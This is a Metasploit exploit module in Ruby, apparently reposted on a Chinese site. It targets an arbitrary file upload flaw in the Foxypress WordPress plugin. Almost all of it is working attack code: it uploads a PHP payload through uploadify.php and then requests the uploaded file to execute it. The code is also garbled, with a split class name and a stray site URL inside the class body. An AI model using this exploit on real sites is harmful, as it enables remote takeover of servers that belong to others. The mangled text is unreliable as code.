require 'msf/core' class Met asp loit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress plugin Foxypress uploadify.php Arbitrary Code Execution', 'Description' => %q{ This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plug-in versions 0.4.2.1 and below are vulnerable. }, 'Author' => [ 'Sammy FORGIT', # Vulnerability Discovery, PoC 'patrick' # Metasploit module ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['EDB', '18991'], ['OSVDB', '82652'], ['BID', '53805'], ], 'Privileged' => false, 'Payload' => { 'Compat' => { 'ConnectionType' => 'find', }, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jun 05 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]), ], self.class) end def check uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php" }) if res and res.code == 200 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end www.2cto.com def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" post_data = Rex::MIME::Message.new post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") print_status("#{peer} - Sending PHP payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php", 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, 'data' => post_data.to_s }) if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ print_error("#{peer} - File wasn't uploaded, aborting!") return end print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}wp-content/affiliate_images/#{$1}.php" }) if res and res.code != 200 print_error("#{peer} - Server returned #{res.code.to_s}") end end end
查看更多关于WordPress插件Foxypress uploadify.php任意代码执行 - 网站的详细内容...